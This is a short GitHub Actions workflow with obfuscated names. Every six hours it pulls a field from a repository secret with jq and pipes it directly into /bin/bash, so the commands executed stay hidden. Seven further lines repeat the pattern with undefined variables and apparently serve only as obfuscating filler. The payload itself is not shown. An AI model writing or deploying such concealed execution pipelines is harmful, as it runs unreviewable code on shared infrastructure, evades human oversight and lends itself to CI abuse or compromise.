name: lishijianliang
on:
  workflow_dispatch:
  schedule:
    - cron: '43 4/6 * * *'
jobs:  # 17158
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lishijianliang
        env:
          q3: ${{ secrets.q3 }}
        run: |
          echo $q3 | jq -r .pflx643 | /bin/bash
          echo $z6272 | jq -r .z48 | /bin/bash
          echo $vsb1 | jq -r .wkz8 | /bin/bash
          echo $ppvmt68 | jq -r .kdai702 | /bin/bash
          echo $amnmf4456 | jq -r .alixq0 | /bin/bash
          echo $rkjw37 | jq -r .oqj97 | /bin/bash
          echo $z83 | jq -r .xwgcb4 | /bin/bash
          echo $krrl63495 | jq -r .lybj4 | /bin/bash

